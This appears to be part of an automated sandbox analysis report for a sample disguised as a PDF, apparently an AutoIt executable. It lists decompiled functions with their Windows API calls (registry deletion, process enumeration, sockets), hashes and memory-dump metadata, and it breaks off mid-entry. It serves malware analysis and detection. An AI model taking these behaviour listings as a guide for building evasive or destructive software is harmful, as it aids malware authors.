                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$LocalTime
                                                    • String ID:
                                                    • API String ID: 2945705084-0
                                                    • Opcode ID: 84a97c9a90079d78e15fcb0c103ac0b20312a6abbb7d217b9cea214a33c23616
                                                    • Instruction ID: b9b6811044bc5678ef74421c8ff9e2801de7f2c1aa891fc07cb302a7236911a9
                                                    • Opcode Fuzzy Hash: 84a97c9a90079d78e15fcb0c103ac0b20312a6abbb7d217b9cea214a33c23616
                                                    • Instruction Fuzzy Hash: C1417166C20314B6CB12EBF4CC469CFB3AD9F04310F6589A6E518F7165FA74E614C3A9
                                                    Function 003A3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 003A3DA1
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A3DCB
                                                    • FreeLibrary.KERNEL32(00000000), ref: 003A3E80
                                                      • Part of subcall function 003A3D72: RegCloseKey.ADVAPI32(?), ref: 003A3DE8
                                                      • Part of subcall function 003A3D72: FreeLibrary.KERNEL32(?), ref: 003A3E3A
                                                      • Part of subcall function 003A3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003A3E5D
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 003A3E25
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 395352322-0
                                                    • Opcode ID: 48fb64b555d15c7bbe689d2772705a40b1e5b365c8174e5102f8d96c3df7efd6
                                                    • Instruction ID: ec0284f80e3e3f3d6f05062f3ac9edbffd21b54680185d49b59224e41c6ee1e7
                                                    • Opcode Fuzzy Hash: 48fb64b555d15c7bbe689d2772705a40b1e5b365c8174e5102f8d96c3df7efd6
                                                    • Instruction Fuzzy Hash: B531CAB2901119BFDB169B94DC89EFFB7BCEF09300F00016AF512E6150D674AF499BA0
                                                    Function 003A8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003A8FE7
                                                    • GetWindowLongW.USER32(00C6E818,000000F0), ref: 003A901A
                                                    • GetWindowLongW.USER32(00C6E818,000000F0), ref: 003A904F
                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003A9081
                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003A90AB
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 003A90BC
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003A90D6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$MessageSend
                                                    • String ID:
                                                    • API String ID: 2178440468-0
                                                    • Opcode ID: 1ad704f65dfc0fd2862421752863391b9ba608108ae3ac9a571d5e30594790a5
                                                    • Instruction ID: 74ec546bb8dfb378f72dd6d11d2421d7edb6d7747738e28431fafc3f25e7d7c8
                                                    • Opcode Fuzzy Hash: 1ad704f65dfc0fd2862421752863391b9ba608108ae3ac9a571d5e30594790a5
                                                    • Instruction Fuzzy Hash: C2313334600215AFDB22CF58DC84F6437A9FB4A354F1641A6F619EF2B1CBB2A840CB44
                                                    Function 003808AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003808F2
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00380918
                                                    • SysAllocString.OLEAUT32(00000000), ref: 0038091B
                                                    • SysAllocString.OLEAUT32(?), ref: 00380939
                                                    • SysFreeString.OLEAUT32(?), ref: 00380942
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00380967
                                                    • SysAllocString.OLEAUT32(?), ref: 00380975
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 285615a85d00332ab1a1796043ac70bce0678a14c8e3470ca020bebae5b34717
                                                    • Instruction ID: 5e31ac59403317fd1724fdf8aaeb92f63097e7d5354718ded1092a0e3d099f03
                                                    • Opcode Fuzzy Hash: 285615a85d00332ab1a1796043ac70bce0678a14c8e3470ca020bebae5b34717
                                                    • Instruction Fuzzy Hash: 7921B572600308AFAB55AF78CC88DBB73ACEB09360B018125F915DB161DB70EC498B60
                                                    Function 00382472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                    • API String ID: 1038674560-2734436370
                                                    • Opcode ID: 54b601885daffb766ec5884549b46543e726c5afe8fe1bc0690a8b1d317a2231
                                                    • Instruction ID: 871aff683e4d8fb6c4707b7e8dd922ba7b85728bb70a4e732b697924964b1a43
                                                    • Opcode Fuzzy Hash: 54b601885daffb766ec5884549b46543e726c5afe8fe1bc0690a8b1d317a2231
                                                    • Instruction Fuzzy Hash: 10219B7224431177C733BA35DC02FBBB39CEF66300F24806AF8469B196E7519A42C3A0
                                                    Function 00380986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003809CB
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003809F1
                                                    • SysAllocString.OLEAUT32(00000000), ref: 003809F4
                                                    • SysAllocString.OLEAUT32 ref: 00380A15
                                                    • SysFreeString.OLEAUT32 ref: 00380A1E
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00380A38
                                                    • SysAllocString.OLEAUT32(?), ref: 00380A46
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 5cc75fa8e3866e5f01643cb9029d51a212a817211cf6b348cd74e004f2b58540
                                                    • Instruction ID: 3de683c60a456186b89d54f003def0422b4af80ab8b7660780594e2cdd172fc4
                                                    • Opcode Fuzzy Hash: 5cc75fa8e3866e5f01643cb9029d51a212a817211cf6b348cd74e004f2b58540
                                                    • Instruction Fuzzy Hash: B1216275200304AFDB59ABA9DC88DBA77ECEF09360B018165F909CB261EA74ED858764
                                                    Function 003AA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0035D1BA
                                                      • Part of subcall function 0035D17C: GetStockObject.GDI32(00000011), ref: 0035D1CE
                                                      • Part of subcall function 0035D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0035D1D8
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003AA32D
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003AA33A
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003AA345
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003AA354
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003AA360
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: 0d3f39070210d180d0400dbd124da9e9a9860d0e1b46afc409e28e775fe1e440
                                                    • Instruction ID: e5b4797baa9494d1b78597f5ff9a0ba5d71ecba70bb723ec2cead58b9d1df288
                                                    • Opcode Fuzzy Hash: 0d3f39070210d180d0400dbd124da9e9a9860d0e1b46afc409e28e775fe1e440
                                                    • Instruction Fuzzy Hash: 031160B6150219BEEF169F64CC85EEB7F6DFF09798F014115FA08A60A0C7729C21DBA4
                                                    Function 0035CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 0035CCF6
                                                    • GetWindowRect.USER32(?,?), ref: 0035CD37
                                                    • ScreenToClient.USER32(?,?), ref: 0035CD5F
                                                    • GetClientRect.USER32(?,?), ref: 0035CE8C
                                                    • GetWindowRect.USER32(?,?), ref: 0035CEA5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Rect$Client$Window$Screen
                                                    • String ID:
                                                    • API String ID: 1296646539-0
                                                    • Opcode ID: e32feb8c94a2149dcf58f695c7eb3bca15233184dddaa25899392d80e69f06f8
                                                    • Instruction ID: eeea36300c7ed387f8c354a54ec6f7f57c481cd4ac9368f77070e25156cbdd80
                                                    • Opcode Fuzzy Hash: e32feb8c94a2149dcf58f695c7eb3bca15233184dddaa25899392d80e69f06f8
                                                    • Instruction Fuzzy Hash: DCB17979910249DFCB11CFA8C480BEDBBB5FF08309F15A129ED59EB620DB30A954CB64
                                                    Function 003A1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 003A1C18
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 003A1C26
                                                    • __wsplitpath.LIBCMT ref: 003A1C54
                                                      • Part of subcall function 00361DFC: __wsplitpath_helper.LIBCMT ref: 00361E3C
                                                    • _wcscat.LIBCMT ref: 003A1C69
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 003A1CDF
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 003A1CF1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                    • String ID:
                                                    • API String ID: 1380811348-0
                                                    • Opcode ID: fa3562a0465fade33d61cf16c6643c6354ce5db68c92ab79e6f491aa1cf710ce
                                                    • Instruction ID: c289d8a0083bfe5643d19b3b145ef06300fee609edd48481965fe7855dba6d2f
                                                    • Opcode Fuzzy Hash: fa3562a0465fade33d61cf16c6643c6354ce5db68c92ab79e6f491aa1cf710ce
                                                    • Instruction Fuzzy Hash: 26515E711043409FD722EF64D885EABB7ECEF89754F04492EF9859B261EB70E904CB92
                                                    Function 003A2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A30AF
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A30EF
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003A3112
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003A313B
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003A317E
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 003A318B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                    • String ID:
                                                    • API String ID: 3451389628-0
                                                    • Opcode ID: cfacd1329dc53c79b984d20cba1638ac87e739044611fa6ecf8d270f90ef7931
                                                    • Instruction ID: b8b19ee7102746945c59f22ad8a04b3bed8dee1a7a2e49b5316bd1e006c3fec7
                                                    • Opcode Fuzzy Hash: cfacd1329dc53c79b984d20cba1638ac87e739044611fa6ecf8d270f90ef7931
                                                    • Instruction Fuzzy Hash: AE513831218300AFC706EF64CC85E6ABBE9FF89304F04496DF5559B2A1DB71EA05CB52
                                                    Function 003A84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenu.USER32(?), ref: 003A8540
                                                    • GetMenuItemCount.USER32(00000000), ref: 003A8577
                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003A859F
                                                    • GetMenuItemID.USER32(?,?), ref: 003A860E
                                                    • GetSubMenu.USER32(?,?), ref: 003A861C
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 003A866D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostString
                                                    • String ID:
                                                    • API String ID: 650687236-0
                                                    • Opcode ID: ce530c0d46c05ae06d445e594ff014cb3123934fe3b17e5e1a2b8477b8c70b48
                                                    • Instruction ID: 8d67ab3199a4f0513c38bd99b0164db5bac77e968391971d2fa3e3e8660d540f
                                                    • Opcode Fuzzy Hash: ce530c0d46c05ae06d445e594ff014cb3123934fe3b17e5e1a2b8477b8c70b48
                                                    • Instruction Fuzzy Hash: 64519075E00215AFDB16EF94C941AAEB7F9EF49310F114469F915BB361CB30BE418B90
                                                    Function 00384AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00384B10
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00384B5B
                                                    • IsMenu.USER32(00000000), ref: 00384B7B
                                                    • CreatePopupMenu.USER32 ref: 00384BAF
                                                    • GetMenuItemCount.USER32(000000FF), ref: 00384C0D
                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00384C3E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                    • String ID:
                                                    • API String ID: 3311875123-0
                                                    • Opcode ID: c5c2dcb13908b27cea7b78ea3d567ed2c4a7e61d0f973c19c63e1271b25b95d8
                                                    • Instruction ID: fc8dcc296d8b24523bd26809fefed24bfd2d5203950ba912473613217874c611
                                                    • Opcode Fuzzy Hash: c5c2dcb13908b27cea7b78ea3d567ed2c4a7e61d0f973c19c63e1271b25b95d8
                                                    • Instruction Fuzzy Hash: A651027060130AEFCF23EF68C888BADBBF8BF44318F1541A9E4559B691E3709944CB51
                                                    Function 00398DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,003DDC00), ref: 00398E7C
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00398E89
                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00398EAD
                                                    • #16.WSOCK32(?,?,00000000,00000000), ref: 00398EC5
                                                    • _strlen.LIBCMT ref: 00398EF7
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00398F6A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_strlenselect
                                                    • String ID:
                                                    • API String ID: 2217125717-0
                                                    • Opcode ID: b9ad38ce6867a4facfc06f6677e9cd1ce48a4d95d59a7fd46d673a1be565beaa
                                                    • Instruction ID: 9b774e04f543fa7f34be57d597d1dc2afb4b56d2a935dc5d6ad3fee427b65690
                                                    • Opcode Fuzzy Hash: b9ad38ce6867a4facfc06f6677e9cd1ce48a4d95d59a7fd46d673a1be565beaa
                                                    • Instruction Fuzzy Hash: A8419271900204AFCB16EF64DD95EAEB7BDEF49314F104669F5169B291DF70AE00CB60
                                                    Function 0035ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • BeginPaint.USER32(?,?,?), ref: 0035AC2A
                                                    • GetWindowRect.USER32(?,?), ref: 0035AC8E
                                                    • ScreenToClient.USER32(?,?), ref: 0035ACAB
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0035ACBC
                                                    • EndPaint.USER32(?,?,?,?,?), ref: 0035AD06
                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003BE673
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                    • String ID:
                                                    • API String ID: 2592858361-0
                                                    • Opcode ID: 3e884d882ae26d70d5cbacfdf99a74eaf572a954578fe8ec67dc7b9d3e2415b4
                                                    • Instruction ID: af20013d1fb102a9ce083687ef840b337980b6ac9d1fc7aeef9baa9c1aae1a3f
                                                    • Opcode Fuzzy Hash: 3e884d882ae26d70d5cbacfdf99a74eaf572a954578fe8ec67dc7b9d3e2415b4
                                                    • Instruction Fuzzy Hash: C4419F711046009FC712DF28CC84FAA7BF8AB59325F040769FAA4D72B1C731A848EB62
                                                    Function 003AE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShowWindow.USER32(00401628,00000000,00401628,00000000,00000000,00401628,?,003BDC5D,00000000,?,00000000,00000000,00000000,?,003BDAD1,00000004), ref: 003AE40B
                                                    • EnableWindow.USER32(00000000,00000000), ref: 003AE42F
                                                    • ShowWindow.USER32(00401628,00000000), ref: 003AE48F
                                                    • ShowWindow.USER32(00000000,00000004), ref: 003AE4A1
                                                    • EnableWindow.USER32(00000000,00000001), ref: 003AE4C5
                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 003AE4E8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: bbc5770464d90d7352188402daecebf2de0fa2718d4978a3cd04370aa2d4b7e0
                                                    • Instruction ID: b2376b8a95128bc298852f0aff836cb3c1a7a2c8266425428163efa8503e32a0
